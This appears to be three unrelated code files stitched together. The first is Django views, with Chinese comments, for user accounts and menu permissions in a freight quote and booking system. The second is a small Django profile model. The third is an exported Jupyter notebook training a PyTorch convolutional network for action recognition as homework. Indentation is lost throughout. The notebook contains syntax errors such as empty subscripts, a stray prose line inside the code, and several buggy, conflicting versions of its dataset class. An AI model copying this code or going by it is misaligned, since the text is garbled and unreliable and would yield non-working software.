# # 新增记录, 需要写3个表 auth_user, users_userprofile, q_user_setup_profit
# # auth_user默认值设置
# # user.is_staff = 0 不是staff
# # user.is_active = 1 是
# # user.is_superuser = 0 不是
#
# uk_range = UKRange.objects.all()
# euro_country = EuroCountry.objects.all()
#
# # get all data from user_form
# email = request.POST.get("email", "")
#
# username = request.POST.get('username')
# first_name = request.POST.get('first_name')
# last_name = request.POST.get('last_name')
# telephone = request.POST.get('telephone', 0)
# role = int(request.POST.get('role'))
# fav_company = request.POST.get('fav_company')
# uk_mode = request.POST.get('uk_mode')
# uk_value = float(request.POST.get('uk_value'))
# euro_mode = request.POST.get('euro_mode')
# euro_value = float(request.POST.get('euro_value'))
#
# # 新增用户
# with transaction.atomic():
# User.objects.create(username=username,
# email=email,
# first_name=first_name,
# last_name=last_name,
# is_staff=0,
# is_active=1,
# is_superuser=0,
# last_login=timezone.now(),
# date_joined=timezone.now(),
# )
# # 保存密码
# user = User.objects.get(username__exact=username)
# if user is not None and user.is_active:
# password = request.POST.get('password')
# user.set_password(password)
# user.save()
#
# # 新增用户附加资料
# if uk_mode == '0': # fix_amount
# uk_fix_amount = uk_value
# uk_percent = 0
# else:
# uk_fix_amount = 0
# uk_percent = uk_value
#
# if euro_mode == '0': # fix_amount
# euro_fix_amount = euro_value
# euro_percent = 0
# else:
# euro_fix_amount = 0
# euro_percent = euro_value
#
# fav_company = Company.objects.get(name__exact=fav_company)
#
# with transaction.atomic():
# UserProfile.objects.create(user_id=user.id,
# telephone=telephone,
# mod_date=datetime.datetime.now(),
# staff_role=0,
# role_id=role,
# favorite_company=fav_company,
# euro_fix_amount=euro_fix_amount,
# euro_percent=euro_percent,
# uk_fix_amount=uk_fix_amount,
# uk_percent=uk_percent,
# )
# with transaction.atomic():
# for uk in uk_range:
# UserSetupProfit.objects.create(is_uk='UK',
# fix_amount=uk_fix_amount,
# percent=uk_percent,
# uk_area_id=uk.id,
# user_id=user.id,
# )
#
# for euro in euro_country:
# UserSetupProfit.objects.create(is_uk='EURO',
# fix_amount=euro_fix_amount,
# percent=euro_percent,
# euro_area_id=euro.id,
# user_id=user.id,
# )
return HttpResponseRedirect(reverse('quote:user-list'))
# 修改 QUOTE 的用户菜单的权限
class SetUserPermissionView(View):
def get(self, request, pk):
user = User.objects.get(id=pk)
permission_list = get_user_grant_list(pk)
return render(request, "user_set_permission.html", {'menu_active': 'USERS',
'menu_grant': get_user_grant_list(request.user.id),
'user': user,
'permission_list': permission_list,
})
def post(self, request, pk):
booking_system = request.POST.get("booking_system", "0")
quote_system = request.POST.get("quote_system", "0")
express_price = request.POST.get("express_price", "0")
sku_list = request.POST.get("sku_list", "0")
air_freight = request.POST.get("air_freight", "0")
lcl_price = request.POST.get("lcl_price", "0")
user_maintenance = request.POST.get("user_maintenance", "0")
xiaomi_bill = request.POST.get("xiaomi_bill", "0")
lcl_data_maintenance = request.POST.get("lcl_data_maintenance", "0")
flc_quote = request.POST.get("flc_quote", "0")
flc_data_maintenance = request.POST.get("flc_data_maintenance", "0")
ocean_quote = request.POST.get("ocean_quote", "0")
permission_string = express_price + sku_list + air_freight + lcl_price + user_maintenance + xiaomi_bill \
+ lcl_data_maintenance + flc_quote + flc_data_maintenance + ocean_quote + "0000"
booking_system_string = ""
if booking_system == "1":
booking_system_string = "BOOKING-SYSTEM"
quote_system_string = ""
if quote_system == "1":
quote_system_string = "QUOTE-SYSTEM"
if booking_system_string and quote_system_string:
system_menu = booking_system_string + "|" + quote_system_string
else:
system_menu = booking_system_string + quote_system_string
permission_queryset = UserProfile.objects.filter(user_id=pk)
if permission_queryset[0].staff_role == 0:
staff_role = 1
else:
staff_role = permission_queryset[0].staff_role
if permission_queryset:
permission_queryset.update(menu_grant=permission_string,
system_menu=system_menu,
staff_role=staff_role,
)
return redirect("users:edit_quote_user", pk=pk)
# 显示 Slot 用户资料
class SlotUserProfile(DetailView):
model = User
template_name = 'slot_user_profile.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
email_group_queryset = SlotEmailGroup.objects.filter(position__exact=self.request.user.profile.op_position)
context['all_email_group'] = email_group_queryset
context['menu_grant'] = get_user_grant_list(self.request.user.id, "BOOKING-SYSTEM")
context['page_tab'] = 3
return context
# 更新 Slot 用户资料
class SlotUserProfileUpdateView(UpdateView):
model = User
form_class = SlotUserUpdateForm
template_name = 'slot_user_profile_update.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
email_group_queryset = SlotEmailGroup.objects.filter(position__exact=self.request.user.profile.op_position)
context['all_email_group'] = email_group_queryset
context['menu_grant'] = get_user_grant_list(self.request.user.id, "BOOKING-SYSTEM")
context['page_tab'] = 3
return context
def form_invalid(self, form): # 定义表对象没有添加失败后跳转到的页面。
response = super().form_invalid(form)
return response
def form_valid(self, form):
user_profile = UserProfile.objects.filter(user_id=self.kwargs['pk'])
user_profile.update(telephone=form.data['telephone'])
user_profile.update(staff_role=form.data['role'])
user_profile.update(email_group_id=form.data['email_group'])
return super(SlotUserProfileUpdateView, self).form_valid(form)
def get_success_url(self):
return reverse_lazy("users:slot_user_profile", kwargs={'pk': self.object.pk})
# 更新 SLOT 的用户密码
class ChangeSlotUserPwdView(View):
def get(self, request, pk, ):
user = User.objects.get(id=pk)
parameter = {'user': user,
"page_tab": 3,
'menu_grant': get_user_grant_list(
request.user.id, "BOOKING-SYSTEM"),
}
return render(request, "slot_user_change_password.html", parameter)
# return render(request, "slot_user_change_password.html", change_pwd_get(request, pk, 1))
def post(self, request, pk):
username = request.POST.get("username", "")
old_password = request.POST.get("old_password", "")
password = request.POST.get("password", "")
re_password = request.POST.get("re_password", "")
# 需要在这里分别处理, 如果是经理修改其它用户的密码, 这不需要验证原密码,用户自己修改密码,则需要验证原密码
if request.user.profile.staff_role == 3 and request.user.username != username:
user = User.objects.filter(username__exact=username)[0]
else:
user = auth.authenticate(username=request.user.username, password=old_password)
if user is not None and user.is_active:
new_password = request.POST.get("password", "")
change_pwd_form = ModifyPwdForm(request.POST)
if change_pwd_form.is_valid():
user.set_password(new_password)
user.save()
# Python内置了一个locals()函数,它返回当前所有的本地变量字典
if request.user.username == username:
return redirect("users:login")
else:
return redirect("users:slot_user_update", pk=user.id)
else:
return render(request, 'slot_user_change_password.html', {"message": "",
'old_password': old_password,
'password': password,
're_password': re_password,
'change_pwd_form': change_pwd_form,
'user': user,
"page_tab": 3,
'menu_grant': get_user_grant_list(
request.user.id, "BOOKING-SYSTEM"),
})
else:
user = User.objects.filter(id=request.user.id)[0]
return render(request, 'slot_user_change_password.html', {"message": "Old password is wrong. Try again",
'old_password': old_password,
'password': password,
're_password': re_password,
'user': user,
"page_tab": 3,
'menu_grant': get_user_grant_list(
request.user.id, "BOOKING-SYSTEM"),
})
# 新增SLOT的用户
class SlotAddUserView(View):
def get(self, request):
all_email_group = SlotEmailGroup.objects.filter(~Q(id=1), position__exact=request.user.profile.op_position)
return render(request, "slot_add_user_profile.html", {"page_tab": 3,
'menu_grant': get_user_grant_list(
request.user.id, "BOOKING-SYSTEM"),
"all_email_group": all_email_group,
})
def post(self, request):
user_form = SlotUserForm(request.POST)
all_email_group = SlotEmailGroup.objects.filter(~Q(id=1), position__exact=request.user.profile.op_position)
if not user_form.is_valid():
return render(request, "slot_add_user_profile.html", {'user_form': user_form,
"page_tab": 3,
'menu_grant': get_user_grant_list(request.user.id,
"BOOKING-SYSTEM"),
'all_email_group': all_email_group,
})
# 新增记录, 需要写2个表 auth_user, users_userprofile
# auth_user默认值设置
# user.is_staff = 0 不是staff
# user.is_active = 1 是
# user.is_superuser = 0 不是
# get all data from user_form
email = request.POST.get("email", "")
username = request.POST.get('username')
first_name = request.POST.get('first_name')
last_name = request.POST.get('last_name')
telephone = request.POST.get('telephone', 0)
email_group = request.POST.get('email_group')
role = request.POST.get('role')
status = request.POST.get('status', 0)
# 经理级别的可以增加,修改,暂停
permission = "11111111111111111" # 系统权限默认值,目前没有用,主要是用经理级别来控制,系统从第二位开始判断
# 新增用户
with transaction.atomic():
User.objects.create(username=username,
email=email,
first_name=first_name,
last_name=last_name,
is_staff=0,
is_active=status,
is_superuser=0,
last_login=timezone.now(),
date_joined=timezone.now(),
)
# 保存密码
user = User.objects.get(username__exact=username)
if user is not None and user.is_active:
password = request.POST.get('password')
user.set_password(password)
user.save()
# 新增用户附加资料
uk_percent = 0
uk_fix_amount = 0
euro_percent = 0
euro_fix_amount = 0
fav_company = 1 # 默认用户最喜爱的公司为1 - PARCEL FORCE
with transaction.atomic(): # 新增用户附加资料 users_userprofile
UserProfile.objects.create(user_id=user.id,
telephone=telephone,
mod_date=datetime.datetime.now(),
email_group_id=email_group,
staff_role=role,
favorite_company_id=fav_company,
euro_fix_amount=euro_fix_amount,
euro_percent=euro_percent,
uk_fix_amount=uk_fix_amount,
uk_percent=uk_percent,
op_position=request.user.profile.op_position,
menu_grant=permission,
system_menu='SLOT',
)
return HttpResponseRedirect(reverse('slot:slot_user_list'))
|
996,869 | c6dce336c8ea75fabfab3eb538b8232e7ed789f3 | from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profiles')
country = models.CharField(max_length=250, blank=True, null=True)
b_day = models.DateField()
|
996,870 | b951349dd94a0d15dacfe36c9cc7f8e744fbfaee | #!/usr/bin/env python
# coding: utf-8
# # Training a ConvNet PyTorch
#
# In this notebook, you'll learn how to use the powerful PyTorch framework to specify a conv net architecture and train it on the human action recognition dataset.
#
# In[30]:
#ip install -r requirements.txt
# In[1]:
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader,sampler,Dataset
import torchvision.datasets as dset
import torchvision.transforms as T
import timeit
from PIL import Image
import os
import numpy as np
import scipy.io
import torchvision.models.inception as inception
import csv
import pandas as pd
# ## What's this PyTorch business?
#
# * When using a framework like PyTorch or TensorFlow you can harness the power of the GPU for your own custom neural network architectures without having to write CUDA code directly.
# * this notebook will walk you through much of what you need to do to train models using pytorch. if you want to learn more or need further clarification on topics that aren't fully explained here, here are 2 good Pytorch tutorials. 1): http://pytorch.org/tutorials/beginner/deep_learning_60min_blitz.html 2)http://pytorch.org/tutorials/beginner/pytorch_with_examples.html
# * It's not necessary to have a GPU for this homework, using a GPU can make your code run faster.
#
# ## Load Datasets
#
# In this part, we will load the action recognition dataset for the neural network. In order to load data from our custom dataset, we need to write a custom Dataloader. If you put q3_2_data.mat, /valClips,/trainClips,/testClips under the folder of ./data/ , you do not need to change anything in this part.
# First, load the labels of the dataset, you should write your path of the q3_2_data.mat file.
# In[18]:
label_mat=scipy.io.loadmat('./data/q3_2_data.mat')
label_train=label_mat['trLb']
print(len(label_train))
label_val=label_mat['valLb']
print(len(label_val))
# In[2]:
df = pd.read_csv('/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/train.csv')
vlabel_train=df['Label']
vlabel_train
# In[37]:
ASLabel=vlabel_train[]
ASLabel
# In[48]:
vtrainclips=df.FileName
vtrainclips
# In[24]:
label_train
# In[41]:
label
# ### Dataset class
#
# torch.utils.data.Dataset is an abstract class representing a dataset. The custom dataset should inherit Dataset and override the following methods:
#
# __len__ so that len(dataset) returns the size of the dataset.
# __getitem__ to support the indexing such that dataset[i] can be used to get ith sample
#
# Let’s create a dataset class for our action recognition dataset. We will read images in __getitem__. This is memory efficient because all the images are not stored in the memory at once but read as required.
#
# Sample of our dataset will be a dict {'image':image,'img_path':img_path,'Label':Label}. Our datset will take an optional argument transform so that any required processing can be applied on the sample.
# In[3]:
class ActionDataset(Dataset):
"""Action dataset."""
def __init__(self, root_dir,labels=[], transform=None):
"""
Args:
root_dir (string): Directory with all the images.
labels(list): labels if images.
transform (callable, optional): Optional transform to be applied on a sample.
"""
self.root_dir = root_dir
self.transform = transform
self.length=len(os.listdir(self.root_dir))
self.labels=labels
def __len__(self):
return self.length*3
def __getitem__(self, idx):
folder=idx/3+1
imidx=idx%3+1
folder=str(folder)
imgname=str(imidx)+'.jpg'
img_path = os.path.join(self.root_dir,
folder,imgname)
image = Image.open(img_path)
if len(self.labels)!=0:
Label=self.labels[idx/3][0]-1
if self.transform:
image = self.transform(image)
if len(self.labels)!=0:
sample={'image':image,'img_path':img_path,'Label':Label}
else:
sample={'image':image,'img_path':img_path}
return sample
# In[5]:
# image_dataset=ActionDataset(root_dir='/home/adewopva/Downloads/CNN_AR/CNN-Action-Recognition-master/data/trainClips/',\
# labels=label_train,transform=T.ToTensor())
# #iterating though the dataset
# for i in range(10):
# sample=image_dataset[i]
# print(sample['image'].shape)
# print(sample['Label'])
# print(sample['img_path'])
# In[1]:
'''
For the given path, get the List of all files in the directory tree
'''
def getListOfFiles(dirName):
# create a list of file and sub directories
# names in the given directory
listOfFile = os.listdir(dirName)
allFiles = []
# Iterate over all the entries
for entry in listOfFile:
# Create full path
fullPath = os.path.join(dirName, entry)
# If entry is a directory then get the list of files in this directory
if os.path.isdir(fullPath):
allFiles = allFiles + getListOfFiles(fullPath)
else:
allFiles.append(fullPath)
return allFiles
# In[7]:
data_dir_list
# In[77]:
import os
def listdirs(rootdir):
d=[]
for file in os.listdir(rootdir):
d = os.path.join(rootdir, file)
if os.path.isdir(d):
print(d)
listdirs(d)
rootdir ='/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'
listdirs(rootdir)
# In[14]:
# In[16]:
#V Current as of 2am 1/26
class ActionDataset(Dataset):
"""Action dataset."""
def __init__(self, root_dir,labels=[], transform=None):
"""
Args:
root_dir (string): Directory with all the images.
labels(list): labels if images.
transform (callable, optional): Optional transform to be applied on a sample.
"""
self.root_dir = root_dir
self.transform = transform
self.length=len(os.listdir(self.root_dir))
self.labels=labels
def __len__(self):
return self.length*5
def __getitem__(self, idx):
root=self.root_dir
#we shall store all the file names in this list
img_path1=[]
for path, subdirs, files in os.walk(root):
for name in files:
img_path1.append(os.path.join(path, name))
#print all the file names
for var in img_path1:
if var.endswith(".jpg"):
img_path=var
image = Image.open(img_path)
if len(self.labels)!=0:
#your_path = img/path1
label1 = img_path.split(os.sep)
labels_name={'on_feet':0, 'active':1, 'rest':2, 'escape':3, 'crawling':4}
label2=label1[10]
Label=labels_name[label2]
if self.transform:
image = self.transform(image)
if len(self.labels)!=0:
sample={'image':image,'img_path':img_path,'Label':Label}
else:
sample={'image':image,'img_path':img_path}
#print(sample)
return sample
image_dataset=ActionDataset(root_dir=r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/', labels=vlabel_train,transform=T.ToTensor())
#iterating though the dataset
for i in range(4):
sample1=image_dataset[i]
print(sample1['image'].shape)
print(sample1['Label'])
print(sample1['img_path'])
# In[17]:
#V Current as of 2am 1/26
class ActionDataset(Dataset):
"""Action dataset."""
def __init__(self, root_dir,labels=[], transform=None):
"""
Args:
root_dir (string): Directory with all the images.
labels(list): labels if images.
transform (callable, optional): Optional transform to be applied on a sample.
"""
self.root_dir = root_dir
self.transform = transform
self.length=len(os.listdir(self.root_dir))
self.labels=labels
def __len__(self):
return self.length*5
def __getitem__(self, root):
root=self.root_dir
#we shall store all the file names in this list
#img_path1=[]
for path, subdirs, files in os.walk(root):
for name in files:
img_path1=(os.path.join(path, name))
if img_path1.endswith(".jpg"):
#img_path=var
image = Image.open(img_path1)
#your_path = img/path1
label1 = img_path1.split(os.sep)
labels_name={'on_feet':0, 'active':1, 'rest':2, 'escape':3, 'crawling':4}
label2=label1[10]
Label=labels_name[label2]
if self.transform:
image = self.transform(image)
if len(self.labels)!=0:
sample={'image':image,'img_path':img_path1,'Label':Label}
else:
sample={'image':image,'img_path':img_path1}
#print(sample)
return sample
#break
image_dataset=ActionDataset(root_dir=r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/', labels=vlabel_train,transform=T.ToTensor())
#iterating though the dataset
for i in range (5):
sample1=image_dataset[i]
print(sample1['image'].shape)
print(sample1['Label'])
print(sample1['img_path'])
# In[ ]:
HERE IS THE PROBLEM. The output is just a single image not different image.
# In[22]:
# Working Full Code for video with single action and Multiple actions
import os, sys
import pandas as pd
directory = r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'
input_base = []
for filename in os.listdir(directory):
if filename.endswith(".csv"):
os.path.splitext(filename)
filename = os.path.splitext(filename)[0]
# In[5]:
import os
#img_path1=[]
for path, subdirs, files in os.walk(r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'):
for i in files:
print(os.path.join(path, i))
# In[11]:
#file=img_path.splitext(filename)
filename = os.path.splitext(img_path)[]
filename
# In[9]:
print(len(img_path1))
# In[5]:
print(len(img_path1))
# In[6]:
# #!/usr/bin/python
# # -*- coding: utf-8 -*-
# class ActionDataset(Dataset):
# """Action dataset."""
# def __init__(
# self,
# root_dir,
# labels=[],
# transform=None,
# ):
# """
# Args:
# root_dir (string): Directory with all the images.
# labels(list): labels if images.
# transform (callable, optional): Optional transform to be applied on a sample.
# """
# self.root_dir = root_dir
# self.transform = transform
# self.length = len(os.listdir(self.root_dir))
# self.labels = labels
# def __len__(self):
# return self.length * 3
# def __getitem__(self, idx):
# root = self.root_dir
# # we shall store all the file names in this list
# img_path1 = []
# for (root, dirs, files) in os.walk(root):
# for file in files:
# # append the file name to the list
# img_path1.append(os.path.join(root, file))
# return img_path1
# # print all the file names
# for name in img_path1:
# img_path = name
# image = Image.open(img_path)
# # your_path = imgpath1
# label1 = img_path.split(os.sep)
# labels_name = {
# 'on_feet': 0,
# 'active': 1,
# 'rest': 2,
# 'escape': 3,
# 'crawling': 4,
# }
# label2 = label1[10]
# Label = labels_name[label2]
# if self.transform:
# image = self.transform(image)
# if len(self.labels) != 0:
# sample = {'image': image, 'img_path': img_path,
# 'Label': Label}
# else:
# sample = {'image': image, 'img_path': img_path}
# return sample
# image_dataset = ActionDataset(root_dir='/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'
# , labels=vlabel_train, transform=T.ToTensor())
# # iterating though the dataset
# for i in range(10):
# sample1 = image_dataset[i]
# print (sample1['image'].shape)
# print (sample1['Label'])
# print (sample1['img_path'])
# In[19]:
image_dataset=ActionDataset(root_dir='/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/', labels=vlabel_train,transform=T.ToTensor())
#iterating though the dataset
for i in range(10):
sample=image_dataset[i]
print(sample['image'].shape)
print(sample['Label'])
print(sample['img_path'])
# We can iterate over the created dataset with a 'for' loop as before. However, we are losing a lot of features by using a simple for loop to iterate over the data. In particular, we are missing out on:
#
# * Batching the data
# * Shuffling the data
# * Load the data in parallel using multiprocessing workers.
#
# torch.utils.data.DataLoader is an iterator which provides all these features.
# Dataloaders for the training, validationg and testing set.
# In[38]:
image_dataset_train=ActionDataset(root_dir='./data/trainClips/',labels=label_train,transform=T.ToTensor())
image_dataloader_train = DataLoader(image_dataset_train, batch_size=32,
shuffle=True, num_workers=4)
image_dataset_val=ActionDataset(root_dir='./data/valClips/',labels=label_val,transform=T.ToTensor())
image_dataloader_val = DataLoader(image_dataset_val, batch_size=32,
shuffle=False, num_workers=4)
image_dataset_test=ActionDataset(root_dir='./data/testClips/',labels=[],transform=T.ToTensor())
image_dataloader_test = DataLoader(image_dataset_test, batch_size=32,
shuffle=False, num_workers=4)
# In[39]:
dtype = torch.FloatTensor # the CPU datatype
# Constant to control how frequently we print train loss
print_every = 100
# This is a little utility that we'll use to reset the model
# if we want to re-initialize all our parameters
def reset(m):
if hasattr(m, 'reset_parameters'):
m.reset_parameters()
# ## Example Model
#
# ### Some assorted tidbits
#
# Let's start by looking at a simple model. First, note that PyTorch operates on Tensors, which are n-dimensional arrays functionally analogous to numpy's ndarrays, with the additional feature that they can be used for computations on GPUs.
#
# We'll provide you with a Flatten function, which we explain here. Remember that our image data (and more relevantly, our intermediate feature maps) are initially N x C x H x W, where:
# * N is the number of datapoints
# * C is the number of image channels.
# * H is the height of the intermediate feature map in pixels
# * W is the height of the intermediate feature map in pixels
#
# This is the right way to represent the data when we are doing something like a 2D convolution, that needs spatial understanding of where the intermediate features are relative to each other. When we input data into fully connected affine layers, however, we want each datapoint to be represented by a single vector -- it's no longer useful to segregate the different channels, rows, and columns of the data. So, we use a "Flatten" operation to collapse the C x H x W values per representation into a single long vector. The Flatten function below first reads in the N, C, H, and W values from a given batch of data, and then returns a "view" of that data. "View" is analogous to numpy's "reshape" method: it reshapes x's dimensions to be N x ??, where ?? is allowed to be anything (in this case, it will be C x H x W, but we don't need to specify that explicitly).
# In[40]:
class Flatten(nn.Module):
def forward(self, x):
N, C, H, W = x.size() # read in N, C, H, W
return x.view(N, -1) # "flatten" the C * H * W values into a single vector per image
# ### The example model itself
#
# The first step to training your own model is defining its architecture.
#
# Here's an example of a convolutional neural network defined in PyTorch -- try to understand what each line is doing, remembering that each layer is composed upon the previous layer. We haven't trained anything yet - that'll come next - for now, we want you to understand how everything gets set up. nn.Sequential is a container which applies each layer
# one after the other.
#
# In this example, you see 2D convolutional layers (Conv2d), ReLU activations, and fully-connected layers (Linear). You also see the Cross-Entropy loss function, and the Adam optimizer being used.
#
# Make sure you understand why the parameters of the Linear layer are 10092 and 10.
#
# In[9]:
# Here's where we define the architecture of the model...
simple_model = nn.Sequential(
nn.Conv2d(3, 32, kernel_size=7, stride=2),
nn.ReLU(inplace=True),
Flatten(), # see above for explanation
nn.Linear(10092, 10), # affine layer
)
# Set the type of all data in this model to be FloatTensor
simple_model.type(dtype)
loss_fn = nn.CrossEntropyLoss().type(dtype)
optimizer = optim.Adam(simple_model.parameters(), lr=1e-2) # lr sets the learning rate of the optimizer
# PyTorch supports many other layer types, loss functions, and optimizers - you will experiment with these next. Here's the official API documentation for these (if any of the parameters used above were unclear, this resource will also be helpful).
#
# * Layers: http://pytorch.org/docs/nn.html
# * Activations: http://pytorch.org/docs/nn.html#non-linear-activations
# * Loss functions: http://pytorch.org/docs/nn.html#loss-functions
# * Optimizers: http://pytorch.org/docs/optim.html#algorithms
# ## Training a specific model
#
# In this section, we're going to specify a model for you to construct. The goal here isn't to get good performance (that'll be next), but instead to get comfortable with understanding the PyTorch documentation and configuring your own model.
#
# Using the code provided above as guidance, and using the following PyTorch documentation, specify a model with the following architecture:
#
# * 7x7 Convolutional Layer with 8 filters and stride of 1
# * ReLU Activation Layer
# * 2x2 Max Pooling layer with a stride of 2
# * 7x7 Convolutional Layer with 16 filters and stride of 1
# * ReLU Activation Layer
# * 2x2 Max Pooling layer with a stride of 2
# * Flatten the feature map
# * ReLU Activation Layer
# * Affine layer to map input units to 10 outputs, you need to figure out the input size here.
#
# In[10]:
fixed_model_base = nn.Sequential(
#########1st To Do (10 points)###################
nn.Conv2d(3, 8, kernel_size=7, stride=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride = 2),
nn.Conv2d(8, 16, kernel_size=7, stride=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride = 2),
Flatten(),
nn.ReLU(inplace=True),
nn.Linear(1936, 10)
####################################
)
fixed_model = fixed_model_base.type(dtype)
# To make sure you're doing the right thing, use the following tool to check the dimensionality of your output (it should be 32 x 10, since our batches have size 32 and the output of the final affine layer should be 10, corresponding to our 10 classes):
# In[11]:
## Now we're going to feed a random batch into the model you defined and make sure the output is the right size
x = torch.randn(32, 3, 64, 64).type(dtype)
x_var = Variable(x.type(dtype)) # Construct a PyTorch Variable out of your input data
ans = fixed_model(x_var) # Feed it through the model!
# Check to make sure what comes out of your model
# is the right dimensionality... this should be True
# if you've done everything correctly
print(np.array(ans.size()))
np.array_equal(np.array(ans.size()), np.array([32, 10]))
# ### Train the model.
#
# Now that you've seen how to define a model and do a single forward pass of some data through it, let's walk through how you'd actually train one whole epoch over your training data (using the fixed_model_base we provided above).
#
# Make sure you understand how each PyTorch function used below corresponds to what you implemented in your custom neural network implementation.
#
# Note that because we are not resetting the weights anywhere below, if you run the cell multiple times, you are effectively training multiple epochs (so your performance should improve).
#
# First, set up an RMSprop optimizer (using a 1e-4 learning rate) and a cross-entropy loss function:
# In[31]:
################ 2nd To Do (5 points)##################
optimizer = torch.optim.RMSprop(fixed_model_base.parameters(), lr = 0.0001)
#optimizer = torch.optim.Adadelta(fixed_model_base.parameters(), lr = 0.001)
loss_fn = nn.CrossEntropyLoss()
#loss_fn = nn.MultiMarginLoss()
# In[37]:
# This sets the model in "training" mode.
# This is relevant for some layers that may have different behavior
# in training mode vs testing mode, such as Dropout and BatchNorm.
fixed_model.train()
# Load one batch at a time.
for t, sample in enumerate(image_dataloader_train):
x_var = Variable(sample['image'])
#print(type(x_var.data))
#print(x_var.shape)
y_var = Variable(sample['Label']).long()
# This is the forward pass: predict the scores for each class, for each x in the batch.
scores = fixed_model(x_var)
# Use the correct y values and the predicted y values to compute the loss.
loss = loss_fn(scores, y_var)
if (t + 1) % print_every == 0:
print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
# Zero out all of the gradients for the variables which the optimizer will update.
optimizer.zero_grad()
# This is the backwards pass: compute the gradient of the loss with respect to each
# parameter of the model.
loss.backward()
# Actually update the parameters of the model using the gradients computed by the backwards pass.
optimizer.step()
# Now you've seen how the training process works in PyTorch. To save you writing boilerplate code, we're providing the following helper functions to help you train for multiple epochs and check the accuracy of your model:
# In[41]:
def train(model, loss_fn, optimizer, dataloader, num_epochs = 1):
for epoch in range(num_epochs):
print('Starting epoch %d / %d' % (epoch + 1, num_epochs))
check_accuracy(fixed_model, image_dataloader_val)# check accuracy on the training set
model.train()
for t, sample in enumerate(dataloader):
x_var = Variable(sample['image'])
y_var = Variable(sample['Label'].long())
scores = model(x_var)
loss = loss_fn(scores, y_var)
if (t + 1) % print_every == 0:
print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
optimizer.zero_grad()
loss.backward()
optimizer.step()
def check_accuracy(model, loader):
'''
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
'''
num_correct = 0
num_samples = 0
model.eval() # Put the model in test mode (the opposite of model.train(), essentially)
for t, sample in enumerate(loader):
x_var = Variable(sample['image'])
y_var = sample['Label']
#y_var=y_var.cpu()
scores = model(x_var)
_, preds = scores.data.max(1)#scores.data.cpu().max(1)
#print(preds)
#print(y_var)
num_correct += (preds.numpy() == y_var.numpy()).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('Got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
# ### Check the accuracy of the model.
#
# Let's see the train and check_accuracy code in action -- feel free to use these methods when evaluating the models you develop below.
#
# You should get a training loss of around 1.0-1.2, and a validation accuracy of around 50-60%. As mentioned above, if you re-run the cells, you'll be training more epochs, so your performance will improve past these numbers.
#
# But don't worry about getting these numbers better -- this was just practice before you tackle designing your own model.
# In[39]:
torch.random.manual_seed(54321)
fixed_model.cpu()
fixed_model.apply(reset)
fixed_model.train()
train(fixed_model, loss_fn, optimizer,image_dataloader_train, num_epochs=4)
check_accuracy(fixed_model, image_dataloader_train)# check accuracy on the training set
# ### Don't forget the validation set!
#
# And note that you can use the check_accuracy function to evaluate on the validation set, by passing **image_dataloader_val** as the second argument to check_accuracy. The accuracy on validation set is arround 40-50%.
# In[40]:
check_accuracy(fixed_model, image_dataloader_val)#check accuracy on the validation set
# ##### Train a better model for action recognition!
#
# Now it's your job to experiment with architectures, hyperparameters, loss functions, and optimizers to train a model that achieves better accuracy on the action recognition **validation** set. You can use the check_accuracy and train functions from above.
# In[42]:
###########3rd To Do (16 points, must submit the results to Kaggle) ##############
# Train your model here, and make sure the output of this cell is the accuracy of your best model on the
# train, val, and test sets. Here's some code to get you started. The output of this cell should be the training
# and validation accuracy on your best model (measured by validation accuracy).
fixed_model_base = nn.Sequential(
nn.Conv2d(3, 200, kernel_size=10, stride=3),
nn.ReLU(inplace=True),
nn.MaxPool2d(3, stride = 1),
nn.BatchNorm2d(200),
nn.Dropout2d(0.1),
nn.Conv2d(200, 100, kernel_size=5, stride=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(3, stride = 1),
nn.BatchNorm2d(100),
nn.Dropout2d(0.2),
nn.Conv2d(100, 50, kernel_size=3, stride=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=1),
nn.BatchNorm2d(50),
Flatten(),
nn.Linear(200, 100),
nn.Linear(100, 50),
nn.Linear(50, 10),
nn.LogSoftmax()
####################################
)
fixed_model = fixed_model_base.type(dtype)
optimizer = torch.optim.RMSprop(fixed_model_base.parameters(), lr = 0.0001)
#optimizer = torch.optim.Adadelta(fixed_model_base.parameters(), lr = 0.001)
loss_fn = nn.CrossEntropyLoss()
# ### Describe what you did
#
# In the cell below you should write an explanation of what you did, any additional features that you implemented, and any visualizations or graphs that you make in the process of training and evaluating your network.
# ### Tell us here!
# ########### 4th To Do (4 points) ##############
# * 10X10 Convolution layer with 200 filters with stride 3
# * ReLU layer
# * Max Pool layer with window size 3X3 with stride 1
# * Batch Norm layer with input size 200
# * Dropout layer with penalty 0.1
# * 5X5 Convolution layer with 100 filters with stride 2
# * ReLU layer
# * Max Pool layer with window size 3X3 with stride 1
# * Batch Norm layer with input size 100
# * Dropout layer with penalty 0.2
# * 3X3 Convolution layer with 50 filters and stride 1
# * ReLU layer
# * Max Pool layer with window size 2 and stride 1
# * Batch Norm layer with input size 50
# * Flatten
# * affine layer to reduce inputs from 200 to 100
# * affine layer to reduce inputs from 100 to 50
# * affine layer to reduce inputs from 50 to 10
# * logsoftmaxing layer
